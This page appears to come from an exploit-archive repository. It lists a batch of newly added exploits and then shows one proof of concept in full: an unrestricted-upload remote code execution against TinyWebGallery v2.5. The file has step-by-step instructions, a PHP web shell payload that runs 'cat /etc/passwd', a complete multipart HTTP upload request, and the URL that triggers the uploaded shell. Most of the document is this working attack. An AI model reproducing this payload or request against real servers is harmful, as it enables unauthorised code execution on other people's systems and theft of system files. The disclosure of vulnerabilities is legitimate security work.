0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
124 lines
No EOL
3.6 KiB
Text
124 lines
No EOL
3.6 KiB
Text
#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
|
|
#Application: TinyWebGallery
|
|
#Version: v2.5
|
|
#Bugs: RCE
|
|
#Technology: PHP
|
|
#Vendor URL: http://www.tinywebgallery.com/
|
|
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
|
|
#Date of found: 07-05-2023
|
|
#Author: Mirabbas Ağalarov
|
|
#Tested on: Linux
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
steps:
|
|
|
|
1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
|
|
2. upload .phar file
|
|
payload: payload: <?php echo system("cat /etc/passwd"); ?>
|
|
3. go to file link
|
|
|
|
|
|
poc request:
|
|
|
|
|
|
POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 2123
|
|
Cache-Control: max-age=0
|
|
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
|
|
sec-ch-ua-mobile: ?0
|
|
sec-ch-ua-platform: "Linux"
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://localhost
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: document
|
|
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
|
|
Connection: close
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="token"
|
|
|
|
b2ed5512107a625ef9d5688ced296c61
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
|
|
|
2097152
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="confirm"
|
|
|
|
true
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php echo system("cat /etc/passwd"); ?>
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="userfile[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="twgsize"
|
|
|
|
100000
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip
|
|
Content-Disposition: form-data; name="twgquality"
|
|
|
|
80
|
|
------WebKitFormBoundary53rZRhJinqaMm7Ip--
|
|
|
|
|
|
|
|
|
|
|
|
http://localhost/twg25/pictures/shell.phar |